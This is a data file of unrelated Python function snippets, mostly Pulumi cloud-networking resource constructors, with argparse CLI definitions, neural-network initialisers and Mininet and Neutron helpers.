"def networks_argparse(parser):\n # First of all, we store action value\n subparsers = parser.add_subparsers(help='Action', dest='action')\n\n # All action value are listed here\n # - list: list all item in networks\n # - create: create a new network\n # - update: modify a existing network. All value are not mutable\n # - delete: destroy a network\n # - show: show detail of a specific network\n # - add: add a ip address\n # - remove: remove a ip address\n # - display: display all entries in a address\n # - include: include a entry in a address\n # - exclude: exclude a entry in a address\n subparsers.add_parser('list', help='list all networks')\n create = subparsers.add_parser('create', help='create new network')\n update = subparsers.add_parser('update', help='update network information')\n delete = subparsers.add_parser('delete', help='delete a network')\n show = subparsers.add_parser('show', help='show detail of a specific network')\n add = subparsers.add_parser('add', help='add a address on a network')\n remove = subparsers.add_parser('remove', help='remove a address on a network')\n display = subparsers.add_parser('display', help='display NS entries in a address')\n include = subparsers.add_parser('include', help='include a NS entry in a address')\n exclude = subparsers.add_parser('exclude', help='exclude a NS entry in a address')\n\n # To create a network, we need a network name, a network address and prefix,\n # and optionaly\n # - description: a description of the network\n # - gateway: the network gateway\n # - contact: a contact email for the network\n # - dns-master: the DNS master of reverse resolution\n # - dhcp: the DHCP server for the network\n # - vlan: the VLAN id\n create.add_argument('network', help='network name')\n create.add_argument('--address', help='network address', required=True)\n create.add_argument('--prefix', help='network prefix', required=True)\n create.add_argument('--description', help='a description of the network')\n create.add_argument('--gateway', help='the network gateway address')\n create.add_argument('--contact', help='a contact email for the network')\n create.add_argument('--dns-master', help='DNS master address for reverse DNS')\n create.add_argument('--dhcp', help='DHCP server address')\n create.add_argument('--radius', help='Radius server address')\n create.add_argument('--vlan', help='VLAN id')\n\n # To delete a network, we just need to know the name\n delete.add_argument('network', help='network name')\n\n # To update network information, we need the network name and the following value\n # are mutable\n # - description: a description of the network\n # - gateway: the network gateway\n # - contact: a contact email for the network\n # - dns-master: the DNS master of reverse resolution\n # - dhcp: the DHCP server for the network\n # - vlan: the VLAN id\n update.add_argument('network', help='network name')\n update.add_argument('--description', help='a description of the network')\n update.add_argument('--gateway', help='the network gateway address')\n update.add_argument('--contact', help='a contact email for the network')\n update.add_argument('--dns-master', help='DNS master address for reverse DNS')\n update.add_argument('--dhcp', help='DHCP server address')\n update.add_argument('--radius', help='Radius server address')\n update.add_argument('--vlan', help='VLAN id')\n\n # To have detail of a specific network, we just need the network name\n show.add_argument('network', help='network you want to show')\n\n # To add a new ip we need the network name and the following optionals value\n add.add_argument('network', help='network name')\n add.add_argument('--ip-address', help='IP address')\n add.add_argument('--default-name', help='Default DNS name')\n\n # To remove a ip address, we need to now the network and ip address\n remove.add_argument('network', help='network name')\n remove.add_argument('--ip-address', help='IP address', required=True)\n\n # To include a entry in ip address, we need network, address and a fqdn\n display.add_argument('network', help='network name')\n display.add_argument('address', help='address IP')\n\n # To include a entry in ip address, we need network, address and a fqdn\n include.add_argument('network', help='network name')\n include.add_argument('address', help='address IP')\n include.add_argument('fqdn', help='Full Qualified Domain Name')\n include.add_argument('--type', help='NS type')\n\n # To exclude a entry in ip address, we need network, address and a fqdn\n exclude.add_argument('network', help='network name')\n exclude.add_argument('address', help='address IP')\n exclude.add_argument('fqdn', help='Full Qualified Domain Name')\n exclude.add_argument('--type', help='NS type')",
"def __init__(self, *args):\n _snap.TCrossNet_swiginit(self, _snap.new_TCrossNet(*args))",
"def __init__(self, *args, **kwargs):\n layer_kwargs = lbann.Layer.__init__.__kwdefaults__.copy()\n op_kwargs = {}\n for key, value in kwargs.items():\n if key in layer_kwargs:\n layer_kwargs[key] = value\n else:\n op_kwargs[key] = value\n layer_kwargs['ops'] = [ operator_class(**op_kwargs) ]\n OperatorLayer.__init__(self, *args, **layer_kwargs)",
"def __init__(__self__,\n resource_name: str,\n args: Optional[TargetPoolArgs] = None,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def networkClassCreator(className,*args):\n\n print 'In networkClassCreator: ',args\n return WorldManipulationEvent(['create',className,args])",
"def __init__(__self__,\n resource_name: str,\n args: MeshArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n args: VirtualNetworkApplianceArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def cl_args() -> argparse.Namespace:\n\n parser = argparse.ArgumentParser(\n description=\"Create graph from text file!\"\n )\n parser.add_argument(\n \"file_name\", help=\"Name of data in text file\", type=str\n )\n parser.add_argument(\"vertex_a\", help=\"start vertex\", type=str)\n parser.add_argument(\"vertex_b\", help=\"end vertex\", type=str)\n args = parser.parse_args()\n\n return args",
"def __init__(__self__, *,\n resource_group: pulumi.Input[str],\n access_tier: Optional[pulumi.Input[str]] = None,\n data_lake_enabled: Optional[pulumi.Input[bool]] = None,\n kind: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n network_rule: Optional[pulumi.Input['StorageAccountSpecNetworkRuleArgs']] = None,\n sku: Optional[pulumi.Input['StorageAccountSpecSkuArgs']] = None,\n supports_https_traffic_only: Optional[pulumi.Input[bool]] = None):\n pulumi.set(__self__, \"resource_group\", resource_group)\n if access_tier is not None:\n pulumi.set(__self__, \"access_tier\", access_tier)\n if data_lake_enabled is not None:\n pulumi.set(__self__, \"data_lake_enabled\", data_lake_enabled)\n if kind is not None:\n pulumi.set(__self__, \"kind\", kind)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if network_rule is not None:\n pulumi.set(__self__, \"network_rule\", network_rule)\n if sku is not None:\n pulumi.set(__self__, \"sku\", sku)\n if supports_https_traffic_only is not None:\n pulumi.set(__self__, \"supports_https_traffic_only\", supports_https_traffic_only)",
"def __init__(__self__, *,\n address_space_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n allow_forwarded_traffic: Optional[pulumi.Input[bool]] = None,\n allow_gateway_transit: Optional[pulumi.Input[bool]] = None,\n allow_virtual_network_access: Optional[pulumi.Input[bool]] = None,\n name: Optional[pulumi.Input[str]] = None,\n remote_address_space_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n remote_virtual_network_id: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n use_remote_gateways: Optional[pulumi.Input[bool]] = None,\n virtual_network_id: Optional[pulumi.Input[str]] = None,\n workspace_id: Optional[pulumi.Input[str]] = None):\n if address_space_prefixes is not None:\n pulumi.set(__self__, \"address_space_prefixes\", address_space_prefixes)\n if allow_forwarded_traffic is not None:\n pulumi.set(__self__, \"allow_forwarded_traffic\", allow_forwarded_traffic)\n if allow_gateway_transit is not None:\n pulumi.set(__self__, \"allow_gateway_transit\", allow_gateway_transit)\n if allow_virtual_network_access is not None:\n pulumi.set(__self__, \"allow_virtual_network_access\", allow_virtual_network_access)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if remote_address_space_prefixes is not None:\n pulumi.set(__self__, \"remote_address_space_prefixes\", remote_address_space_prefixes)\n if remote_virtual_network_id is not None:\n pulumi.set(__self__, \"remote_virtual_network_id\", remote_virtual_network_id)\n if resource_group_name is not None:\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n if use_remote_gateways is not None:\n pulumi.set(__self__, \"use_remote_gateways\", use_remote_gateways)\n if virtual_network_id is not None:\n pulumi.set(__self__, \"virtual_network_id\", virtual_network_id)\n if workspace_id is not None:\n pulumi.set(__self__, \"workspace_id\", workspace_id)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n allow_forwarded_traffic: Optional[pulumi.Input[bool]] = None,\n allow_gateway_transit: Optional[pulumi.Input[bool]] = None,\n allow_virtual_network_access: Optional[pulumi.Input[bool]] = None,\n name: Optional[pulumi.Input[str]] = None,\n remote_address_space_prefixes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n remote_virtual_network_id: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n use_remote_gateways: Optional[pulumi.Input[bool]] = None,\n workspace_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def get_arguments():\n parser = argparse.ArgumentParser(description=\"Luo Network\")\n parser.add_argument('-gpu', '--gpu', default=GPU, type=str,\n help='Supprot one GPU & multiple GPUs.')\n parser.add_argument(\"--dataset-name\", type=str, default=DATASET_NAME,\n help=\"The name of the dataset.\")\n parser.add_argument(\"--train-image-path\", type=str, default=TRAIN_IMAGE_PATH,\n help=\"Path to the directory containing the train image.\")\n parser.add_argument(\"--train-label-path\", type=str, default=TRAIN_LABEL_PATH,\n help=\"Path to the directory containing the train label.\")\n parser.add_argument(\"--val-image-path\", type=str, default=VAL_IMAGE_PATH,\n help=\"Path to the directory containing the validation image.\")\n parser.add_argument(\"--val-label-path\", type=str, default=VAL_LABEL_PATH,\n help=\"Path to the directory containing the validation label.\")\n\n parser.add_argument(\"--test-image-path\", type=str, default=TEST_IMAGE_PATH,\n help=\"Path to the directory containing the validation image.\")\n parser.add_argument(\"--test-label-path\", type=str, default=TEST_LABEL_PATH,\n help=\"Path to the directory containing the validation label.\")\n\n parser.add_argument(\"--in-size\", type=int, default=IN_SIZE,\n help=\"The input patch size of the volume.\")\n parser.add_argument(\"--out-size\", type=int, default=OUT_SIZE,\n help=\"The input patch size of the volume.\")\n parser.add_argument(\"--pad\", type=int, default=PAD,\n help=\"The input patch size of the volume.\")\n parser.add_argument(\"--image-num\", type=int, default=IMAGE_NUM,\n help=\"The number of the input images.\")\n parser.add_argument(\"--nor\", type=int, default=NOR,\n help=\"nor.\")\n parser.add_argument(\"--batch-size\", type=int, default=BATCH_SIZE,\n help=\"Number of images sent to the network in one step.\")\n parser.add_argument(\"--in-channels\", type=int, default=IN_CHANNELS,\n help=\"\")\n parser.add_argument(\"--out-channels\", type=int, default=OUT_CHANNELS,\n help=\"\")\n parser.add_argument(\"--branch\", type=int, default=BRANCH,\n help=\"\")\n parser.add_argument(\"--worker-num\", type=int, default=WORKER_NUM,\n help=\"\")\n parser.add_argument(\"--num-filters\", type=int, default=NUM_FILTERS,\n help=\"\")\n parser.add_argument(\"--useallgpu\", type=str, default=USEALLGPU,\n help=\".\")\n parser.add_argument(\"--gpu-device\", type=str, default=GPU_DEVICE,\n help=\".\")\n parser.add_argument(\"--class-num\", type=int, default=CLASS_NUM,\n help=\"Path to the file listing the images in the target dataset.\")\n\n parser.add_argument(\"--learning-rate\", type=float, default=LEARNING_RATE,\n help=\"Base learning rate for training with polynomial decay.\")\n parser.add_argument(\"--start-epoch\", type=int, default=START_EPOCH,\n help=\"The start epoch.\")\n parser.add_argument(\"--end-epoch\", type=int, default=END_EPOCH,\n help=\"The end epoch.\")\n parser.add_argument(\"--snapshot-epoch\", type=int, default=SNAPSHOT_EPOCH,\n help=\"Save summaries and checkpoint every often.\")\n parser.add_argument(\"--val-epoch\", type=int, default=SNAPSHOT_EPOCH,\n help=\"Validation summaries and checkpoint every often..\")\n parser.add_argument(\"--decay-rate\", type=float, default=DECAY_RATE,\n help=\"Regularisation parameter for L2-loss.\")\n parser.add_argument(\"--decay-step\", type=int, default=DECAY_STEP,\n help=\"The step of regularisation parameter for L2-loss.\")\n parser.add_argument(\"--epoch-model-save-prefix\", type=str, default=EPOCH_MODEL_SAVE_PREFIX,\n help=\"The prefix name of model save by epoch.\")\n parser.add_argument(\"--itera-model-save-prefix\", type=str, default=ITERA_MODEL_SAVE_PREFIX,\n help=\"The prefix name of model save by iteration.\")\n parser.add_argument(\"--val-seg-csv-path\", type=str, default=VAL_SEG_CSV_PATH,\n help=\"Where to save the validation csv file.\")\n parser.add_argument(\"--save-dir-path\", type=str, default=SAVE_DIR_PATH,\n help=\"Where to save the file.\")\n parser.add_argument(\"--test-seg-csv-path\", type=str, default=TEST_SEG_CSV_PATH,\n help=\"Where to save the HARD validation csv file.\")\n parser.add_argument(\"--model-save-path\", type=str, default=MODEL_SAVE_PATH,\n help=\"Where to save the model.\")\n parser.add_argument(\"--image-save-path\", type=str, default=IMAGE_SAVE_PATH,\n help=\"Where to save the image.\")\n\n return parser.parse_args()",
"def __init__(__self__, *,\n location: pulumi.Input[str],\n management_cluster: pulumi.Input['PrivateCloudManagementClusterArgs'],\n network_config: pulumi.Input['PrivateCloudNetworkConfigArgs'],\n description: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n project: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"location\", location)\n pulumi.set(__self__, \"management_cluster\", management_cluster)\n pulumi.set(__self__, \"network_config\", network_config)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if project is not None:\n pulumi.set(__self__, \"project\", project)",
"def mk_rg3(self):\n pass",
"def __init__(self, *args):\n this = _libsbml.new_L3ParserSettings(*args)\n try: self.this.append(this)\n except: self.this = this",
"def __init__(self, hparams):\n super(ThreeLayerClassifier, self).__init__()\n self.hparams = hparams\n self.layer_1 = torch.nn.Linear(self.hparams[\"input_size\"], 128)\n self.layer_2 = torch.nn.Linear(128, 256)\n self.layer_3 = torch.nn.Linear(256, self.hparams[\"targets\"])",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n acl_id: Optional[pulumi.Input[str]] = None,\n description: Optional[pulumi.Input[str]] = None,\n dest_cidr: Optional[pulumi.Input[str]] = None,\n dest_port_range: Optional[pulumi.Input[str]] = None,\n direction: Optional[pulumi.Input[str]] = None,\n ip_protocol: Optional[pulumi.Input[str]] = None,\n policy: Optional[pulumi.Input[str]] = None,\n priority: Optional[pulumi.Input[int]] = None,\n source_cidr: Optional[pulumi.Input[str]] = None,\n source_port_range: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def __init__(self, args, normalization_mean, normalization_std,\n style_img, content_img, content_weight=1, style_weight=1000000):\n super(ArtNet, self).__init__()\n\n self.args = args\n\n self.style_img = style_img\n self.content_img = content_img\n\n self.content_layers = ['conv_4']\n self.style_layers = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']\n\n # mean and std used for normalization\n self.normalization_mean = normalization_mean\n self.normalization_std = normalization_std\n\n # weights of content image and style image\n self.content_weight = args.content_weight if args else content_weight\n self.style_weight = args.style_weight if args else style_weight\n\n # initialize vgg19 pre-trained model\n self.model = vgg19(pretrained=True).features.to(device).eval()",
"def __init__(self, optimization_options, network, *args, **kwargs):\n\n self._params = Parameters()\n for path, param in network.get_variables().items():\n self._params.add(path + '_gradient',\n numpy.zeros_like(param.get_value()))\n self._params.add(path + '_sum_sqr_gradient',\n numpy.zeros_like(param.get_value()))\n\n super().__init__(optimization_options, network, *args, **kwargs)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n action: Optional[pulumi.Input[str]] = None,\n layer_name: Optional[pulumi.Input[str]] = None,\n organization_id: Optional[pulumi.Input[str]] = None,\n principal: Optional[pulumi.Input[str]] = None,\n statement_id: Optional[pulumi.Input[str]] = None,\n version_number: Optional[pulumi.Input[int]] = None,\n __props__=None):\n ...",
"def __init__(__self__, *,\n address_space: pulumi.Input[str],\n location: pulumi.Input[str],\n resource_group: pulumi.Input[str],\n subnets: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkSpecSubnetsArgs']]]] = None):\n pulumi.set(__self__, \"address_space\", address_space)\n pulumi.set(__self__, \"location\", location)\n pulumi.set(__self__, \"resource_group\", resource_group)\n if subnets is not None:\n pulumi.set(__self__, \"subnets\", subnets)",
"def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n direction: Optional[pulumi.Input[str]] = None,\n ethertype: Optional[pulumi.Input[str]] = None,\n port_range_max: Optional[pulumi.Input[int]] = None,\n port_range_min: Optional[pulumi.Input[int]] = None,\n protocol: Optional[pulumi.Input[str]] = None,\n region: Optional[pulumi.Input[str]] = None,\n remote_group_id: Optional[pulumi.Input[str]] = None,\n remote_ip_prefix: Optional[pulumi.Input[str]] = None,\n security_group_id: Optional[pulumi.Input[str]] = None,\n tenant_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def __init__(self, functions=None, variables=None, global_resource=None):\n self.ssa = NetworkEnsemble()\n if functions is None:\n self.ssa.functions = dict()\n else:\n self.ssa.functions = functions\n if variables is None:\n self.ssa.variables = dict()\n else:\n self.ssa.variables = variables\n if global_resource is None:\n self.ssa.global_resource = dict()\n else:\n self.ssa.global_resource = global_resource",
"def get(resource_name: str,\n id: pulumi.Input[str],\n opts: Optional[pulumi.ResourceOptions] = None) -> 'L3Network':\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))\n\n __props__ = L3NetworkArgs.__new__(L3NetworkArgs)\n\n __props__.__dict__[\"associated_resource_ids\"] = None\n __props__.__dict__[\"cluster_id\"] = None\n __props__.__dict__[\"detailed_status\"] = None\n __props__.__dict__[\"detailed_status_message\"] = None\n __props__.__dict__[\"extended_location\"] = None\n __props__.__dict__[\"hybrid_aks_clusters_associated_ids\"] = None\n __props__.__dict__[\"hybrid_aks_ipam_enabled\"] = None\n __props__.__dict__[\"hybrid_aks_plugin_type\"] = None\n __props__.__dict__[\"interface_name\"] = None\n __props__.__dict__[\"ip_allocation_type\"] = None\n __props__.__dict__[\"ipv4_connected_prefix\"] = None\n __props__.__dict__[\"ipv6_connected_prefix\"] = None\n __props__.__dict__[\"l3_isolation_domain_id\"] = None\n __props__.__dict__[\"location\"] = None\n __props__.__dict__[\"name\"] = None\n __props__.__dict__[\"provisioning_state\"] = None\n __props__.__dict__[\"system_data\"] = None\n __props__.__dict__[\"tags\"] = None\n __props__.__dict__[\"type\"] = None\n __props__.__dict__[\"virtual_machines_associated_ids\"] = None\n __props__.__dict__[\"vlan\"] = None\n return L3Network(resource_name, opts=opts, __props__=__props__)",
"def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n annotation: Optional[pulumi.Input[str]] = None,\n infrastructure_express_route_connections: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ExpressRouteConnectionInformationArgs']]]]] = None,\n ipv4_address_space: Optional[pulumi.Input[str]] = None,\n ipv6_address_space: Optional[pulumi.Input[str]] = None,\n is_workload_management_network_enabled: Optional[pulumi.Input[Union[str, 'IsWorkloadManagementNetworkEnabled']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n managed_resource_group_configuration: Optional[pulumi.Input[pulumi.InputType['ManagedResourceGroupConfigurationArgs']]] = None,\n network_fabric_controller_name: Optional[pulumi.Input[str]] = None,\n nfc_sku: Optional[pulumi.Input[Union[str, 'NfcSku']]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n workload_express_route_connections: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ExpressRouteConnectionInformationArgs']]]]] = None,\n __props__=None):\n ...",
"def __init__(self, *args: Union[List[AtomKey], EKT], **kwargs: str) -> None:\n ...",
"def __init__(self, *args: Union[List[AtomKey], DKT], **kwargs: str) -> None:\n ...",
"def __init__(self, *args: Union[List[AtomKey], HKT], **kwargs: str) -> None:\n ...",
"def __init__(self, args):\n self.totalArgs = len(args)\n self.marathonURL = args[1]\n self.appid = args[2]\n self.totalports = args[3]",
"def __init__( self, **params ):\n \n host = custom( CPULimitedHost, cpu=cpuShare() ) \n link = custom( TCLink, bw=args.bandwidth, delay=delay() )\n \n Mininet.__init__(\n self,\n topo=BarrierTransactionTopo( **params ),\n host=host,\n link=link )",
"def __init__(self, node1, node2, **kwargs):\n # Create links on remote node\n self.node1 = node1\n self.node2 = node2\n self.tunnel = None\n kwargs.setdefault('params1', {})\n kwargs.setdefault('params2', {})\n kwargs.setdefault('cls1', TCIntf)\n kwargs.setdefault('cls2', TCIntf)\n self.cmd = None # satisfy pylint\n Link.__init__(self, node1, node2, **kwargs)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n cluster_name: Optional[pulumi.Input[str]] = None,\n node_setup: Optional[pulumi.Input[pulumi.InputType['NodeSetupArgs']]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n scale_settings: Optional[pulumi.Input[pulumi.InputType['ScaleSettingsArgs']]] = None,\n subnet: Optional[pulumi.Input[pulumi.InputType['ResourceIdArgs']]] = None,\n user_account_settings: Optional[pulumi.Input[pulumi.InputType['UserAccountSettingsArgs']]] = None,\n virtual_machine_configuration: Optional[pulumi.Input[pulumi.InputType['VirtualMachineConfigurationArgs']]] = None,\n vm_priority: Optional[pulumi.Input['VmPriority']] = None,\n vm_size: Optional[pulumi.Input[str]] = None,\n workspace_name: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def network_create(request, **kwargs):\n LOG.debug(\"network_create(): kwargs = %s\", kwargs)\n if 'tenant_id' not in kwargs:\n kwargs['tenant_id'] = request.user.project_id\n body = {'network': kwargs}\n network = neutronclient(request).create_network(body=body).get('network')\n return Network(network)",
"def __init__(__self__, *,\n backend_address_pool_name: pulumi.Input[str],\n backend_port: pulumi.Input[int],\n frontend_port_range_end: pulumi.Input[int],\n frontend_port_range_start: pulumi.Input[int],\n inbound_nat_pool_name: pulumi.Input[str],\n location: pulumi.Input[str],\n public_ip_address_name: pulumi.Input[str],\n resource_group: pulumi.Input[str]):\n pulumi.set(__self__, \"backend_address_pool_name\", backend_address_pool_name)\n pulumi.set(__self__, \"backend_port\", backend_port)\n pulumi.set(__self__, \"frontend_port_range_end\", frontend_port_range_end)\n pulumi.set(__self__, \"frontend_port_range_start\", frontend_port_range_start)\n pulumi.set(__self__, \"inbound_nat_pool_name\", inbound_nat_pool_name)\n pulumi.set(__self__, \"location\", location)\n pulumi.set(__self__, \"public_ip_address_name\", public_ip_address_name)\n pulumi.set(__self__, \"resource_group\", resource_group)",
"def __init__(__self__, *,\n network_tags: Optional[pulumi.Input['NetworkTagsArgs']] = None):\n if network_tags is not None:\n pulumi.set(__self__, \"network_tags\", network_tags)",
"def __init__(__self__, *,\n resource_group_name: pulumi.Input[str],\n annotation: Optional[pulumi.Input[str]] = None,\n infrastructure_express_route_connections: Optional[pulumi.Input[Sequence[pulumi.Input['ExpressRouteConnectionInformationArgs']]]] = None,\n ipv4_address_space: Optional[pulumi.Input[str]] = None,\n ipv6_address_space: Optional[pulumi.Input[str]] = None,\n is_workload_management_network_enabled: Optional[pulumi.Input[Union[str, 'IsWorkloadManagementNetworkEnabled']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n managed_resource_group_configuration: Optional[pulumi.Input['ManagedResourceGroupConfigurationArgs']] = None,\n network_fabric_controller_name: Optional[pulumi.Input[str]] = None,\n nfc_sku: Optional[pulumi.Input[Union[str, 'NfcSku']]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n workload_express_route_connections: Optional[pulumi.Input[Sequence[pulumi.Input['ExpressRouteConnectionInformationArgs']]]] = None):\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n if annotation is not None:\n pulumi.set(__self__, \"annotation\", annotation)\n if infrastructure_express_route_connections is not None:\n pulumi.set(__self__, \"infrastructure_express_route_connections\", infrastructure_express_route_connections)\n if ipv4_address_space is None:\n ipv4_address_space = '10.0.0.0/19'\n if ipv4_address_space is not None:\n pulumi.set(__self__, \"ipv4_address_space\", ipv4_address_space)\n if ipv6_address_space is None:\n ipv6_address_space = 'FC00::/59'\n if ipv6_address_space is not None:\n pulumi.set(__self__, \"ipv6_address_space\", ipv6_address_space)\n if is_workload_management_network_enabled is None:\n is_workload_management_network_enabled = 'True'\n if is_workload_management_network_enabled is not None:\n pulumi.set(__self__, \"is_workload_management_network_enabled\", is_workload_management_network_enabled)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if managed_resource_group_configuration is not None:\n pulumi.set(__self__, \"managed_resource_group_configuration\", managed_resource_group_configuration)\n if network_fabric_controller_name is not None:\n pulumi.set(__self__, \"network_fabric_controller_name\", network_fabric_controller_name)\n if nfc_sku is None:\n nfc_sku = 'Standard'\n if nfc_sku is not None:\n pulumi.set(__self__, \"nfc_sku\", nfc_sku)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if workload_express_route_connections is not None:\n pulumi.set(__self__, \"workload_express_route_connections\", workload_express_route_connections)",
"def initialize_network(self, model, num_init=None, **net_args):\n\n self.net_args = net_args\n\n if num_init is None:\n self.num_init = 1\n else:\n self.num_init = num_init\n\n nets = []\n for i in range(self.num_init):\n nets.append( model(dim_inp=self.dim_inp, \n dim_out=self.dim_out, **net_args) )\n\n return nets",
"def __init__(__self__,\n resource_name: str,\n args: TransitRouterCidrArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def construct_network(self, n_units, n_samples=1, noise_dim=0,\n keep_p=1., nonlinearity=True, init_params=None, name=\"\"):\n print \"constructing network, n_units: \",n_units\n # TODO use kwargs for more elagant solutions to being called by this \n # base class\n assert keep_p ==1. and nonlinearity and noise_dim == 0\n\n assert init_params is None # this is implemented only in the Bayesian flow version of this function\n\n ### Define parameters of the network\n self.weights, self.biases, KL = {}, {}, 0.\n self.layers = []\n # Establish paramters of appromiate posterior over weights and\n # biases.\n for l in range(1, len(n_units)):\n with tf.variable_scope(name+'Layer_%d'%l):\n n_in, n_out = n_units[l-1], n_units[l]\n\n # use non neglidgible uncertainty if we are doing VI\n sigma_init = self.init_sigma_params\n\n w_prior_sigma, b_prior_sigma = self.w_prior_sigma, self.w_prior_sigma\n mu_init_sigma_w, mu_init_sigma_b = np.sqrt(1./(n_in)), 1.\n\n (w_mu, w_logstd), _, w_KL = utils.set_q(name+\"w_%d\"%l,\n sigma_prior=w_prior_sigma, mu_init_sigma=mu_init_sigma_w,\n sigma_init=sigma_init, n_samples=0,\n size=[n_in, n_out], save_summary=True)\n\n # We use same init_sigma for weights and biases.\n (b_mu, b_logstd), _, b_KL = utils.set_q(name+\"b_%d\"%l,\n sigma_prior=b_prior_sigma, mu_init_sigma=mu_init_sigma_b,\n sigma_init=sigma_init, n_samples=0,\n size=[n_out], save_summary=True)\n self.weights['w_%d_mu'%l], self.weights['w_%d_std'%l] = w_mu, tf.nn.softplus(w_logstd)\n self.biases['b_%d_mu'%l], self.biases['b_%d_std'%l] = b_mu, tf.nn.softplus(b_logstd)\n\n self.params += [w_mu, b_mu, w_logstd, b_logstd]\n KL += w_KL + b_KL\n\n # Add an extra dimension to correspond to samples.\n prev_layer = tf.stack([self.x]*n_samples)\n self.layers.append(prev_layer)\n # shape is [n_samples, ?, dim(x)]\n\n ### Define activations in each layer\n for l in range(1,len(n_units)):\n print \"defining activations in layer %d\"%l\n # Multiply with weight matrix and add bias\n prev_layer = tf.reshape(prev_layer, [-1, n_units[l-1]])\n layer_pre_bias = tf.matmul(prev_layer, self.weights['w_%d_mu'%l])\n layer_pre_bias = tf.reshape(layer_pre_bias, [n_samples, -1, n_units[l]])\n # Shape of layer_pre_bias is [n_samples, ?, n_units[l]]\n\n # add mean bias term\n layer = tf.add(layer_pre_bias, self.biases['b_%d_mu'%l][None, None, :])\n\n # Calculate the noise in each hidden unit.\n # must use absolute value of activation because final layer may\n # have negative values.\n layer_var = tf.matmul(tf.reshape(prev_layer**2,[-1,\n n_units[l-1]]), self.weights['w_%d_std'%l]**2)\n layer_var = tf.reshape(layer_var, [n_samples, -1, n_units[l]])\n layer_var += self.biases['b_%d_std'%l]**2\n\n # Now sample noise and add scaled noise.\n # This constitutes the local reparameterization trick.\n eps = tf.random_normal(name='eps_%d'%l, mean=0.,\n stddev=1.0, shape=[n_samples, 1, n_units[l]])\n layer_sigma = tf.sqrt(layer_var)\n layer += layer_sigma*eps\n with tf.name_scope(name+\"Neural_Network_Activations_%d\"%l):\n tf.summary.histogram(name+\"Layer_%d_sigmas\"%l, layer_sigma)\n tf.summary.histogram(name+\"Layer_%d_activations_pre_tanh\"%l, layer)\n\n # Add tanh nonlinearity\n if l != (len(n_units) - 1): layer = tf.nn.tanh(layer)\n\n with tf.name_scope(name+\"Neural_Network_Activations_%d\"%l):\n tf.summary.histogram(name+\"Layer_%d_activations_post_tanh\"%l,layer)\n\n prev_layer = layer\n self.layers.append(prev_layer)\n self.KL_BNN = KL\n return prev_layer",
"def __init__(__self__, *,\n group: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n namespace: Optional[pulumi.Input[str]] = None,\n resource: Optional[pulumi.Input[str]] = None,\n version: Optional[pulumi.Input[str]] = None):\n if group is not None:\n pulumi.set(__self__, \"group\", group)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if namespace is not None:\n pulumi.set(__self__, \"namespace\", namespace)\n if resource is not None:\n pulumi.set(__self__, \"resource\", resource)\n if version is not None:\n pulumi.set(__self__, \"version\", version)",
"def __init__(self, pool_guid, dataset_name, obj_num, obj_type):\n self.pool_guid = pool_guid\n self.dataset_name = dataset_name\n self.obj_num = obj_num\n self.obj_type = obj_type",
